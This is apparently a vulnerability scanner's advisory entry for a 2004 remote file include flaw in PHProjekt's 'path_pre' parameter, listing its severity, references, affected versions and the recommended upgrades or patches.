| VID |
21878 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The PHProjekt program is vulnerable to a remote file include vulnerability via the 'path_pre' parameter. PHProjekt is an open-source Groupware package written in PHP4. PHProjekt version 4.2.1 and earlier versions could allow a remote attacker to include malicious PHP files, caused by improper validation of user-supplied input passed to the 'path_pre' parameter of the 'lib/authform.inc.php' script. If PHP's 'register_globals' setting is enabled, a remote attacker can send a specially-crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
* References:
http://www.phprojekt.com/modules.php?op=modload&name=News&file=article&sid=193
http://secunia.com/advisories/13660/
* Platforms Affected:
PHProjekt versions prior to 4.2.3
Any operating system Any version |
| Recommendation |
Upgrade to the latest version of PHProjekt (4.2.3 or later), available from the PHProjekt Web site at http://www.phprojekt.com/
-- OR --
Apply the fix for this vulnerability, as listed in PHPProjekt Advisory dated 2004-12-28 at http://www.phprojekt.com/modules.php?op=modload&name=News&file=article&sid=193
For Gentoo Linux:
Upgrade to the latest version of phprojekt (4.2-r2 or later), as listed in Gentoo Linux Security Advisory GLSA 200412-27 at http://www.gentoo.org/security/en/glsa/glsa-200412-27.xml |
| Related URL |
CVE-2004-2740 (CVE) |
| Related URL |
12116 (SecurityFocus) |
| Related URL |
18683 (ISS) |
|
